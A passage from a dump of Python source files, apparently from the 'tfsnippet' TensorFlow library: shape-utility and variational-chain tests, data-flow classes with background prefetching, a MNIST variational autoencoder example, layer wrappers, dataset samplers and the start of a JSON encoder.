# check when the shape is totally dynamic
x_in = tf.placeholder(tf.float32, None)
run_check(sess, x, 0, x_in, dynamic=True)
run_check(sess, x, 1, x_in, dynamic=True)
run_check(sess, x, 2, x_in, dynamic=True)
run_check(sess, x, -1, x_in, dynamic=True)
class GetRankTestCase(tf.test.TestCase):
def test_get_rank(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertEqual(get_rank(ph), 3)
# test partially dynamic shape
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertEqual(get_rank(ph), 3)
# test totally dynamic shape
ph = tf.placeholder(tf.float32, None)
self.assertEqual(
sess.run(get_rank(ph), feed_dict={
ph: np.arange(6, dtype=np.float32).reshape((1, 2, 3))
}),
3
)
class GetDimensionSizeTestCase(tf.test.TestCase):
def test_get_dimension_size(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertEqual(get_dimension_size(ph, 0), 1)
self.assertEqual(get_dimension_size(ph, 1), 2)
self.assertEqual(get_dimension_size(ph, 2), 3)
self.assertEqual(get_dimension_size(ph, -1), 3)
# test dynamic shape, but no dynamic axis is queried
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertEqual(get_dimension_size(ph, 0), 1)
self.assertEqual(get_dimension_size(ph, 2), 3)
self.assertEqual(get_dimension_size(ph, -1), 3)
# test dynamic shape
def _assert_equal(a, b):
self.assertIsInstance(a, tf.Tensor)
self.assertEqual(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
_assert_equal(get_dimension_size(ph, 1), 2)
_assert_equal(get_dimension_size(ph, -2), 2)
axis_ph = tf.placeholder(tf.int32, None)
self.assertEqual(
sess.run(get_dimension_size(ph, axis_ph),
feed_dict={ph: ph_in, axis_ph: 1}),
2
)
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_dimension_size(ph, 0), 1)
_assert_equal(get_dimension_size(ph, 1), 2)
_assert_equal(get_dimension_size(ph, 2), 3)
_assert_equal(get_dimension_size(ph, -2), 2)
def test_get_dimensions_size(self):
with self.test_session() as sess:
# test empty query
ph = tf.placeholder(tf.float32, None)
self.assertTupleEqual(get_dimensions_size(ph, ()), ())
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertTupleEqual(get_dimensions_size(ph), (1, 2, 3))
self.assertTupleEqual(get_dimensions_size(ph, [0]), (1,))
self.assertTupleEqual(get_dimensions_size(ph, [1]), (2,))
self.assertTupleEqual(get_dimensions_size(ph, [2]), (3,))
self.assertTupleEqual(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
# test dynamic shape, but no dynamic axis is queried
ph = tf.placeholder(tf.float32, (1, None, 3))
self.assertTupleEqual(get_dimensions_size(ph, [0]), (1,))
self.assertTupleEqual(get_dimensions_size(ph, [2]), (3,))
self.assertTupleEqual(get_dimensions_size(ph, [2, 0]), (3, 1))
# test dynamic shape
def _assert_equal(a, b):
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
self.assertIsInstance(a, tf.Tensor)
np.testing.assert_equal(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
_assert_equal(get_dimensions_size(ph), (1, 2, 3))
_assert_equal(get_dimensions_size(ph, [1]), (2,))
_assert_equal(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_dimensions_size(ph), (1, 2, 3))
_assert_equal(get_dimensions_size(ph, [0]), (1,))
_assert_equal(get_dimensions_size(ph, [1]), (2,))
_assert_equal(get_dimensions_size(ph, [2]), (3,))
_assert_equal(get_dimensions_size(ph, [2, 0, 1]), (3, 1, 2))
def test_get_shape(self):
with self.test_session() as sess:
# test static shape
ph = tf.placeholder(tf.float32, (1, 2, 3))
self.assertTupleEqual(get_shape(ph), (1, 2, 3))
# test dynamic shape
def _assert_equal(a, b):
ph_in = np.arange(6, dtype=np.float32).reshape((1, 2, 3))
self.assertIsInstance(a, tf.Tensor)
np.testing.assert_equal(sess.run(a, feed_dict={ph: ph_in}), b)
ph = tf.placeholder(tf.float32, (1, None, 3))
_assert_equal(get_shape(ph), (1, 2, 3))
# test fully dynamic shape
ph = tf.placeholder(tf.float32, None)
_assert_equal(get_shape(ph), (1, 2, 3))
class ConcatShapesTestCase(tf.test.TestCase):
def test_concat_shapes(self):
with self.test_session() as sess:
# test empty
self.assertTupleEqual(concat_shapes(()), ())
# test static shapes
self.assertTupleEqual(
concat_shapes(iter([
(1, 2),
(3,),
(),
(4, 5)
])),
(1, 2, 3, 4, 5)
)
# test having dynamic shape
shape = concat_shapes([
(1, 2),
tf.constant([3], dtype=tf.int32),
(),
tf.constant([4, 5], dtype=tf.int32),
])
self.assertIsInstance(shape, tf.Tensor)
np.testing.assert_equal(sess.run(shape), (1, 2, 3, 4, 5))
class IsShapeEqualTestCase(tf.test.TestCase):
def test_is_shape_equal(self):
def check(x, y, x_ph=None, y_ph=None):
ans = x.shape == y.shape
feed_dict = {}
if x_ph is not None:
feed_dict[x_ph] = x
x = x_ph
if y_ph is not None:
feed_dict[y_ph] = y
y = y_ph
result = is_shape_equal(x, y)
if is_tensor_object(result):
result = sess.run(result, feed_dict=feed_dict)
self.assertEqual(result, ans)
with self.test_session() as sess:
# check static shapes
x1 = np.random.normal(size=[2, 3, 4])
x2 = np.random.normal(size=[2, 1, 4])
x3 = np.random.normal(size=[1, 2, 3, 4])
check(x1, np.copy(x1))
check(x1, x2)
check(x1, x3)
            # check partially dynamic shapes
x1_ph = tf.placeholder(dtype=tf.float32, shape=[2, None, 4])
x2_ph = tf.placeholder(dtype=tf.float32, shape=[2, None, 4])
x3_ph = tf.placeholder(dtype=tf.float32, shape=[None] * 4)
check(x1, np.copy(x1), x1_ph, x2_ph)
check(x1, x2, x1_ph, x2_ph)
check(x1, x3, x1_ph, x3_ph)
            # check fully dynamic shapes
x1_ph = tf.placeholder(dtype=tf.float32, shape=None)
x2_ph = tf.placeholder(dtype=tf.float32, shape=None)
x3_ph = tf.placeholder(dtype=tf.float32, shape=None)
check(x1, np.copy(x1), x1_ph, x2_ph)
check(x1, x2, x1_ph, x2_ph)
check(x1, x3, x1_ph, x3_ph)
```
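A sketch (not from the repository) of the static/dynamic split these tests verify: the helpers return plain Python values when a dimension is statically known and `tf.Tensor`s otherwise.
```python
import numpy as np
import tensorflow as tf
from tfsnippet.utils import get_static_shape, get_shape, get_batch_size

static_ph = tf.placeholder(tf.float32, [2, 3, 4])
dynamic_ph = tf.placeholder(tf.float32, [None, 3, 4])

print(get_static_shape(static_ph))     # (2, 3, 4)
print(get_static_shape(dynamic_ph))    # (None, 3, 4)
print(get_shape(static_ph))            # (2, 3, 4), a plain tuple
print(get_batch_size(static_ph, 0))    # 2, a plain int

batch_size = get_batch_size(dynamic_ph, 0)   # a tf.Tensor, resolved at run time
with tf.Session() as sess:
    x = np.zeros([7, 3, 4], dtype=np.float32)
    print(sess.run(batch_size, feed_dict={dynamic_ph: x}))   # 7
```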
#### File: tests/utils/test_tfver.py
```python
import unittest
import tensorflow as tf
from tfsnippet.utils import is_tensorflow_version_higher_or_equal
class IsTensorflowVersionHigherOrEqualTestCase(unittest.TestCase):
def test_is_tensorflow_version_higher_or_equal(self):
# test compatibility with current version
tf_version = tf.__version__
self.assertTrue(is_tensorflow_version_higher_or_equal(tf_version),
msg='{} >= {} not hold'.format(tf_version, tf_version))
# test various cases
try:
versions = [
'0.1.0', '0.9.0', '0.12.0', '0.12.1',
'1.0.0-rc0', '1.0.0-rc1', '1.0.0', '1.0.1',
]
for i, v0 in enumerate(versions):
tf.__version__ = v0
for v in versions[:i+1]:
self.assertTrue(is_tensorflow_version_higher_or_equal(v),
msg='{} >= {} not hold'.format(v0, v))
for v in versions[i+1:]:
self.assertFalse(is_tensorflow_version_higher_or_equal(v),
msg='{} < {} not hold'.format(v0, v))
finally:
tf.__version__ = tf_version
```
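A one-line guard (not from the repository) is the typical use of this helper; the `1.5.0` threshold below is arbitrary.
```python
import tensorflow as tf
from tfsnippet.utils import is_tensorflow_version_higher_or_equal

if not is_tensorflow_version_higher_or_equal('1.5.0'):
    raise RuntimeError('TensorFlow >= 1.5.0 is required, found {}'
                       .format(tf.__version__))
```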
#### File: tests/variational/test_chain.py
```python
import numpy as np
import tensorflow as tf
from mock import Mock
from tfsnippet.variational import VariationalChain, VariationalInference
class VariationalChainTestCase(tf.test.TestCase):
def prepare_model(self):
variational_local_log_probs = Mock(
return_value=[tf.constant(1.), tf.constant(2.)])
variational = Mock(
local_log_probs=Mock(
wraps=lambda names: variational_local_log_probs(tuple(names))),
__iter__=Mock(return_value=iter(['a', 'b'])),
)
model_local_log_probs = Mock(
return_value=[tf.constant(3.), tf.constant(4.)])
model = Mock(
local_log_probs=Mock(
wraps=lambda names: model_local_log_probs(tuple(names))),
__iter__=Mock(return_value=iter(['c', 'd'])),
)
return (variational_local_log_probs, variational,
model_local_log_probs, model)
def test_default_args(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model)
self.assertEqual(variational_local_log_probs.call_args,
((('a', 'b'),),))
self.assertEqual(model_local_log_probs.call_args,
((('c', 'd'),),))
self.assertIs(chain.variational, variational)
self.assertIs(chain.model, model)
self.assertEqual(chain.latent_names, ('a', 'b'))
self.assertIsNone(chain.latent_axis)
self.assertIsInstance(chain.vi, VariationalInference)
with self.test_session() as sess:
np.testing.assert_allclose(chain.log_joint.eval(), 7.)
np.testing.assert_allclose(chain.vi.log_joint.eval(), 7.)
np.testing.assert_allclose(sess.run(chain.vi.latent_log_probs),
[1., 2.])
def test_log_joint_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, log_joint=tf.constant(-1.))
self.assertEqual(variational_local_log_probs.call_args,
((('a', 'b'),),))
self.assertFalse(model_local_log_probs.called)
with self.test_session():
np.testing.assert_allclose(chain.log_joint.eval(), -1.)
np.testing.assert_allclose(chain.vi.log_joint.eval(), -1.)
def test_latent_names_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, latent_names=iter(['a']))
self.assertEqual(variational_local_log_probs.call_args,
((('a',),),))
self.assertEqual(model_local_log_probs.call_args,
((('c', 'd'),),))
self.assertEqual(chain.latent_names, ('a',))
def test_latent_axis_arg(self):
(variational_local_log_probs, variational,
model_local_log_probs, model) = self.prepare_model()
chain = VariationalChain(variational, model, latent_axis=1)
self.assertEqual(chain.latent_axis, 1)
self.assertEqual(chain.vi.axis, 1)
```
#### File: tfsnippet/dataflow/iterator_flow.py
```python
from .base import DataFlow
__all__ = ['IteratorFactoryFlow']
class IteratorFactoryFlow(DataFlow):
"""
Data flow constructed from an iterator factory.
Usage::
x_flow = DataFlow.arrays([x], batch_size=256)
y_flow = DataFlow.arrays([y], batch_size=256)
xy_flow = DataFlow.iterator_factory(lambda: (
(x, y) for (x,), (y,) in zip(x_flow, y_flow)
))
"""
def __init__(self, factory):
"""
Construct an :class:`IteratorFactoryFlow`.
Args:
factory (() -> Iterator or Iterable): A factory method for
constructing the mini-batch iterators for each epoch.
"""
self._factory = factory
def _minibatch_iterator(self):
for batch in self._factory():
yield batch
```
#### File: tfsnippet/dataflow/threading_flow.py
```python
from threading import Thread, Semaphore
import six
from logging import getLogger
from tfsnippet.utils import AutoInitAndCloseable
from .base import DataFlow
if six.PY2:
from Queue import Queue
else:
from queue import Queue
__all__ = ['ThreadingFlow']
class ThreadingFlow(DataFlow, AutoInitAndCloseable):
"""
Data flow to prefetch from the source data flow in a background thread.
Usage::
array_flow = DataFlow.arrays([x, y], batch_size=256)
with array_flow.threaded(prefetch=5) as df:
for epoch in epochs:
for batch_x, batch_y in df:
...
"""
EPOCH_END = object()
"""Object to mark an ending position of an epoch."""
def __init__(self, source, prefetch):
"""
Construct a :class:`ThreadingFlow`.
Args:
source (DataFlow): The source data flow.
prefetch (int): Number of mini-batches to prefetch ahead.
It should be at least 1.
"""
# check the parameters
if prefetch < 1:
raise ValueError('`prefetch` must be at least 1')
# memorize the parameters
self._source = source
self._prefetch_num = prefetch
# internal states for background worker
self._worker = None # type: Thread
self._batch_queue = None # type: Queue
self._epoch_counter = None # counter for tracking the active epoch
self._stopping = None
self._worker_alive = None
self._worker_ready_sem = None
@property
def source(self):
"""Get the source data flow."""
return self._source
@property
def prefetch_num(self):
"""Get the number of batches to prefetch."""
return self._prefetch_num
def _worker_func(self):
active_epoch = self._epoch_counter
self._worker_alive = True
self._worker_ready_sem.release()
try:
while not self._stopping:
# iterate through the mini-batches in the current epoch
for batch in self.source:
if self._stopping or active_epoch < self._epoch_counter:
break
self._batch_queue.put((active_epoch, batch))
# put the epoch ending mark into the queue
if not self._stopping:
self._batch_queue.put((active_epoch, self.EPOCH_END))
# move to the next epoch
active_epoch += 1
except Exception: # pragma: no cover
getLogger(__name__).warning(
'{} exited because of error.'.format(self.__class__.__name__),
exc_info=True
)
raise
finally:
self._worker_alive = False
def _init(self):
# prepare for the worker states
self._batch_queue = Queue(self.prefetch_num)
self._epoch_counter = 0
self._stopping = False
self._worker_ready_sem = Semaphore(value=0)
# create and start the worker
self._worker = Thread(target=self._worker_func)
self._worker.daemon = True
self._worker.start()
# wait for the thread to show up
self._worker_ready_sem.acquire()
def _close(self):
try:
# prevent the worker thread from further work
self._stopping = True
# exhaust all remaining queue items to notify the background worker
while not self._batch_queue.empty():
self._batch_queue.get()
# wait until the worker exit
self._worker.join()
finally:
self._worker = None
self._batch_queue = None
self._worker_ready_sem = None
self._initialized = False
def _minibatch_iterator(self):
self.init()
try:
# iterate through one epoch
while self._worker_alive:
epoch, payload = self._batch_queue.get()
if epoch < self._epoch_counter:
# we've got a remaining item from the last epoch, skip it
pass
elif epoch > self._epoch_counter: # pragma: no cover
# we've accidentally got an item from the future epoch
# it should be a bug, and we shall report it
raise RuntimeError('Unexpected entry from future epoch.')
elif payload is self.EPOCH_END:
# we've got the epoch ending mark for the current epoch,
# so we should break the loop
break
else:
# we've got a normal batch for the current epoch,
# so yield it
yield payload
finally:
self._epoch_counter += 1
```
#### File: examples/auto_encoders/vae.py
```python
import functools
import click
import tensorflow as tf
from tensorflow.contrib.framework import arg_scope, add_arg_scope
from tfsnippet.bayes import BayesianNet
from tfsnippet.distributions import Normal, Bernoulli
from tfsnippet.examples.datasets import load_mnist, bernoulli_flow
from tfsnippet.examples.nn import (l2_regularizer,
regularization_loss,
dense)
from tfsnippet.examples.utils import (MLConfig,
MLResults,
save_images_collection,
config_options,
pass_global_config,
bernoulli_as_pixel,
print_with_title)
from tfsnippet.scaffold import TrainLoop
from tfsnippet.trainer import AnnealingDynamicValue, Trainer, Evaluator
from tfsnippet.utils import global_reuse, flatten, unflatten, create_session
class ExpConfig(MLConfig):
# model parameters
z_dim = 40
x_dim = 784
# training parameters
write_summary = False
max_epoch = 3000
max_step = None
batch_size = 128
l2_reg = 0.0001
initial_lr = 0.001
lr_anneal_factor = 0.5
lr_anneal_epoch_freq = 300
lr_anneal_step_freq = None
# evaluation parameters
test_n_z = 500
test_batch_size = 128
@global_reuse
@add_arg_scope
@pass_global_config
def q_net(config, x, observed=None, n_z=None, is_training=True):
net = BayesianNet(observed=observed)
# compute the hidden features
with arg_scope([dense],
activation_fn=tf.nn.leaky_relu,
kernel_regularizer=l2_regularizer(config.l2_reg)):
h_x = tf.to_float(x)
h_x = dense(h_x, 500)
h_x = dense(h_x, 500)
# sample z ~ q(z|x)
z_mean = dense(h_x, config.z_dim, name='z_mean')
z_logstd = dense(h_x, config.z_dim, name='z_logstd')
z = net.add('z', Normal(mean=z_mean, logstd=z_logstd), n_samples=n_z,
group_ndims=1)
return net
@global_reuse
@add_arg_scope
@pass_global_config
def p_net(config, observed=None, n_z=None, is_training=True):
net = BayesianNet(observed=observed)
# sample z ~ p(z)
z = net.add('z', Normal(mean=tf.zeros([1, config.z_dim]),
logstd=tf.zeros([1, config.z_dim])),
group_ndims=1, n_samples=n_z)
# compute the hidden features
with arg_scope([dense],
activation_fn=tf.nn.leaky_relu,
kernel_regularizer=l2_regularizer(config.l2_reg)):
h_z, s1, s2 = flatten(z, 2)
h_z = dense(h_z, 500)
h_z = dense(h_z, 500)
# sample x ~ p(x|z)
x_logits = unflatten(dense(h_z, config.x_dim, name='x_logits'), s1, s2)
x = net.add('x', Bernoulli(logits=x_logits), group_ndims=1)
return net
@click.command()
@click.option('--result-dir', help='The result directory.', metavar='PATH',
required=False, type=str)
@config_options(ExpConfig)
@pass_global_config
def main(config, result_dir):
# print the config
print_with_title('Configurations', config.format_config(), after='\n')
# open the result object and prepare for result directories
results = MLResults(result_dir)
results.make_dirs('plotting', exist_ok=True)
results.make_dirs('train_summary', exist_ok=True)
# input placeholders
input_x = tf.placeholder(
dtype=tf.int32, shape=(None, config.x_dim), name='input_x')
is_training = tf.placeholder(
dtype=tf.bool, shape=(), name='is_training')
learning_rate = tf.placeholder(shape=(), dtype=tf.float32)
learning_rate_var = AnnealingDynamicValue(config.initial_lr,
config.lr_anneal_factor)
# build the model
with arg_scope([q_net, p_net], is_training=is_training):
# derive the loss and lower-bound for training
train_q_net = q_net(input_x)
train_chain = train_q_net.chain(
p_net, latent_names=['z'], latent_axis=0, observed={'x': input_x})
vae_loss = tf.reduce_mean(train_chain.vi.training.sgvb())
loss = vae_loss + regularization_loss()
# derive the nll and logits output for testing
test_q_net = q_net(input_x, n_z=config.test_n_z)
test_chain = test_q_net.chain(
p_net, latent_names=['z'], latent_axis=0, observed={'x': input_x})
test_nll = -tf.reduce_mean(test_chain.vi.evaluation.is_loglikelihood())
test_lb = tf.reduce_mean(test_chain.vi.lower_bound.elbo())
# derive the optimizer
optimizer = tf.train.AdamOptimizer(learning_rate)
params = tf.trainable_variables()
grads = optimizer.compute_gradients(loss, var_list=params)
with tf.control_dependencies(
tf.get_collection(tf.GraphKeys.UPDATE_OPS)):
train_op = optimizer.apply_gradients(grads)
# derive the plotting function
with tf.name_scope('plot_x'):
plot_p_net = p_net(n_z=100, is_training=is_training)
x_plots = tf.reshape(bernoulli_as_pixel(plot_p_net['x']), (-1, 28, 28))
def plot_samples(loop):
with loop.timeit('plot_time'):
images = session.run(x_plots, feed_dict={is_training: False})
save_images_collection(
images=images,
filename='plotting/{}.png'.format(loop.epoch),
grid_size=(10, 10),
results=results
)
# prepare for training and testing data
(x_train, y_train), (x_test, y_test) = load_mnist()
train_flow = bernoulli_flow(
x_train, config.batch_size, shuffle=True, skip_incomplete=True)
test_flow = bernoulli_flow(
x_test, config.test_batch_size, sample_now=True)
with create_session().as_default() as session, \
train_flow.threaded(5) as train_flow:
# train the network
with TrainLoop(params,
var_groups=['q_net', 'p_net'],
max_epoch=config.max_epoch,
max_step=config.max_step,
summary_dir=(results.system_path('train_summary')
if config.write_summary else None),
summary_graph=tf.get_default_graph(),
early_stopping=False) as loop:
trainer = Trainer(
loop, train_op, [input_x], train_flow,
feed_dict={learning_rate: learning_rate_var, is_training: True},
metrics={'loss': loss}
)
trainer.anneal_after(
learning_rate_var,
epochs=config.lr_anneal_epoch_freq,
steps=config.lr_anneal_step_freq
)
evaluator = Evaluator(
loop,
metrics={'test_nll': test_nll, 'test_lb': test_lb},
inputs=[input_x],
data_flow=test_flow,
feed_dict={is_training: False},
time_metric_name='test_time'
)
evaluator.after_run.add_hook(
lambda: results.update_metrics(evaluator.last_metrics_dict))
trainer.evaluate_after_epochs(evaluator, freq=10)
trainer.evaluate_after_epochs(
functools.partial(plot_samples, loop), freq=10)
trainer.log_after_epochs(freq=1)
trainer.run()
# print the final metrics and close the results object
print_with_title('Results', results.format_metrics(), before='\n')
results.close()
if __name__ == '__main__':
main()
```
#### File: examples/datasets/utils.py
```python
import numpy as np
from tfsnippet.dataflow import DataFlow
from tfsnippet.preprocessing import BernoulliSampler, UniformNoiseSampler
__all__ = ['bernoulli_flow', 'quantized_flow']
def _create_sampled_dataflow(arrays, sampler, sample_now, **kwargs):
if sample_now:
arrays = sampler(*arrays)
df = DataFlow.arrays(arrays, **kwargs)
if not sample_now:
df = df.map(sampler)
return df
def bernoulli_flow(x, batch_size, shuffle=False, skip_incomplete=False,
sample_now=False, dtype=np.int32, random_state=None):
"""
Construct a new :class:`DataFlow`, which samples 0/1 binary images
according to the given `x` array.
Args:
x: The `train_x` or `test_x` of an image dataset. The pixel values
must be 8-bit integers, having the range of ``[0, 255]``.
batch_size (int): Size of each mini-batch.
shuffle (bool): Whether or not to shuffle data before iterating?
(default :obj:`False`)
skip_incomplete (bool): Whether or not to exclude the last
mini-batch if it is incomplete? (default :obj:`False`)
sample_now (bool): Whether or not to sample immediately instead
of sampling at the beginning of each epoch? (default :obj:`False`)
dtype: The data type of the sampled array. Default `np.int32`.
random_state (RandomState): Optional numpy RandomState for
shuffling data before each epoch. (default :obj:`None`,
use the global :class:`RandomState`).
Returns:
DataFlow: The Bernoulli `x` flow.
"""
x = np.asarray(x)
# prepare the sampler
x = x / np.asarray(255., dtype=x.dtype)
sampler = BernoulliSampler(dtype=dtype, random_state=random_state)
# compose the data flow
return _create_sampled_dataflow(
[x], sampler, sample_now, batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
def quantized_flow(x, batch_size, shuffle=False, skip_incomplete=False,
normalize=False, sample_now=False, dtype=np.float32,
random_state=None):
"""
Construct a new :class:`DataFlow`, which adds uniform noises onto
the given `x` array.
Args:
x: The `train_x` or `test_x` of an image dataset. The pixel values
must be 8-bit integers, having the range of ``[0, 255]``.
batch_size (int): Size of each mini-batch.
shuffle (bool): Whether or not to shuffle data before iterating?
(default :obj:`False`)
skip_incomplete (bool): Whether or not to exclude the last
mini-batch if it is incomplete? (default :obj:`False`)
normalize (bool): Whether or not to normalize the sampled array?
If :obj:`True`, the sampled array would range in ``[0, 1)``.
If :obj:`False`, the sampled array would range in ``[0, 256)``.
Default :obj:`False`.
sample_now (bool): Whether or not to sample immediately instead
of sampling at the beginning of each epoch? (default :obj:`False`)
dtype: The data type of the sampled array. Default `np.float32`.
random_state (RandomState): Optional numpy RandomState for
shuffling data before each epoch. (default :obj:`None`,
use the global :class:`RandomState`).
Returns:
DataFlow: The quantized `x` flow.
"""
x = np.asarray(x)
# prepare the sampler
if normalize:
x = x / np.asarray(256., dtype=x.dtype)
maxval = np.asarray(1 / 256., dtype=x.dtype)
else:
maxval = np.asarray(1., dtype=x.dtype)
minval = np.asarray(0., dtype=x.dtype)
sampler = UniformNoiseSampler(minval=minval, maxval=maxval, dtype=dtype,
random_state=random_state)
# compose the data flow
return _create_sampled_dataflow(
[x], sampler, sample_now, batch_size=batch_size, shuffle=shuffle,
skip_incomplete=skip_incomplete, random_state=random_state
)
```
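A quick usage sketch for `bernoulli_flow`: it builds a flow from random 8-bit "images" and pulls one mini-batch. The array shape and batch size are arbitrary assumptions; the import path follows the `from tfsnippet.examples.datasets import bernoulli_flow` line used in the VAE example above.
```python
import numpy as np

from tfsnippet.examples.datasets import bernoulli_flow

# fake 8-bit "images": 1000 samples with 784 pixels each
x = np.random.randint(0, 256, size=(1000, 784)).astype(np.uint8)

# pixels are re-sampled as 0/1 values each time the flow is iterated
flow = bernoulli_flow(x, batch_size=64, shuffle=True, skip_incomplete=True)

for (batch_x,) in flow:
    print(batch_x.shape, batch_x.dtype)  # (64, 784) int32
    break
```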
#### File: examples/nn/wrapper.py
```python
import tensorflow as tf
from tensorflow.contrib.framework import add_arg_scope
from tfsnippet.examples.utils import (add_variable_scope,
validate_strides_or_kernel_size)
__all__ = [
'dense', 'conv2d', 'deconv2d', 'batch_norm_2d',
]
@add_arg_scope
@add_variable_scope
def dense(inputs,
units,
activation_fn=None,
normalizer_fn=None,
use_bias=True,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.dense(
inputs=inputs,
units=units,
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
return output
@add_arg_scope
@add_variable_scope
def conv2d(inputs,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
channels_last=False,
use_bias=True,
activation_fn=None,
normalizer_fn=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.conv2d(
inputs=inputs,
filters=filters,
kernel_size=validate_strides_or_kernel_size('kernel_size', kernel_size),
strides=validate_strides_or_kernel_size('strides', strides),
padding=padding,
data_format='channels_last' if channels_last else 'channels_first',
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
return output
@add_arg_scope
@add_variable_scope
def deconv2d(inputs,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
channels_last=False,
use_bias=True,
activation_fn=None,
normalizer_fn=None,
kernel_initializer=None,
bias_initializer=tf.zeros_initializer(),
kernel_regularizer=None,
bias_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
trainable=True,
name=None):
output = tf.layers.conv2d_transpose(
inputs=inputs,
filters=filters,
kernel_size=validate_strides_or_kernel_size('kernel_size', kernel_size),
strides=validate_strides_or_kernel_size('strides', strides),
padding=padding,
data_format='channels_last' if channels_last else 'channels_first',
use_bias=use_bias and (normalizer_fn is None),
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer,
kernel_regularizer=kernel_regularizer,
bias_regularizer=bias_regularizer,
kernel_constraint=kernel_constraint,
bias_constraint=bias_constraint,
trainable=trainable,
name='activation'
)
if normalizer_fn is not None:
output = normalizer_fn(output)
if activation_fn is not None:
output = activation_fn(output)
return output
@add_arg_scope
def batch_norm_2d(inputs,
channels_last=False,
momentum=0.99,
epsilon=1e-3,
center=True,
scale=True,
beta_initializer=tf.zeros_initializer(),
gamma_initializer=tf.ones_initializer(),
moving_mean_initializer=tf.zeros_initializer(),
moving_variance_initializer=tf.ones_initializer(),
beta_regularizer=None,
gamma_regularizer=None,
beta_constraint=None,
gamma_constraint=None,
training=False,
trainable=True,
name=None):
return tf.layers.batch_normalization(
inputs=inputs,
axis=-1 if channels_last else 1,
momentum=momentum,
epsilon=epsilon,
center=center,
scale=scale,
beta_initializer=beta_initializer,
gamma_initializer=gamma_initializer,
moving_mean_initializer=moving_mean_initializer,
moving_variance_initializer=moving_variance_initializer,
beta_regularizer=beta_regularizer,
gamma_regularizer=gamma_regularizer,
beta_constraint=beta_constraint,
gamma_constraint=gamma_constraint,
trainable=trainable,
training=training,
name=name
)
```
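A minimal sketch of how these wrappers compose with `arg_scope`, mirroring the way `q_net` uses `dense` in the VAE example above. The placeholder shape and layer sizes are arbitrary; the import path is assumed to match `from tfsnippet.examples.nn import dense`.
```python
import tensorflow as tf
from tensorflow.contrib.framework import arg_scope

from tfsnippet.examples.nn import dense

x = tf.placeholder(dtype=tf.float32, shape=[None, 32], name='x')

# every `dense` call inside the scope shares the same activation function;
# the wrapper applies the linear transform first, then normalizer_fn (if any),
# then activation_fn
with arg_scope([dense], activation_fn=tf.nn.relu):
    h = dense(x, 64, name='h1')
    h = dense(h, 64, name='h2')
```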
#### File: examples/utils/jsonutils.py
```python
import json
from base64 import b64encode, b64decode
from datetime import datetime
import numpy as np
import six
__all__ = [
'JsonBinary', 'JsonEncoder', 'JsonDecoder',
]
class JsonBinary(object):
"""
Wrapper class for binary objects.
In Python 2, ordinary strings are binary strings, thus the encoder cannot
tell which strings should be base64-encoded. In this case, one
may explicitly wrap such a binary string in this class to inform the
encoder.
Args:
value (bytes): The wrapped binary object.
"""
def __init__(self, value):
if not isinstance(value, six.binary_type):
raise TypeError('`value` is not a binary object.')
self.value = value
def __repr__(self):
return 'JsonBinary(%r)' % (self.value,)
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return isinstance(other, JsonBinary) and self.value == other.value
def __ne__(self, other):
return isinstance(other, JsonBinary) and self.value != other.value
def __lt__(self, other):
return isinstance(other, JsonBinary) and self.value < other.value
def __le__(self, other):
return isinstance(other, JsonBinary) and self.value <= other.value
def __gt__(self, other):
return isinstance(other, JsonBinary) and self.value > other.value
def __ge__(self, other):
return isinstance(other, JsonBinary) and self.value >= other.value
class JsonEncoder(json.JSONEncoder):
"""
Extended JSON encoder with support of the following types:
* bytes | JsonBinary ->
{'__type__': 'binary', 'data': base64 encoded}
* numpy.ndarray ->
{'__type__': 'ndarray', 'data': o.tolist(), 'dtype': o.dtype}
Besides, if the same (customized) object is referenced multiple
times, and if `object_ref` is set to True, it will be serialized
only at its first occurrence. All later occurrences will be saved as:
{'__type__': 'ObjectRef', 'id': ...}.
Args:
object_ref (bool): Whether or not to allow serializing same object as
references? (default :obj:`True`)
"""
NO_REF_TYPES = six.integer_types + (float, bool, datetime,)
def __init__(self, object_ref=True, **kwargs):
super(JsonEncoder, self).__init__(**kwargs)
self.object_ref = object_ref
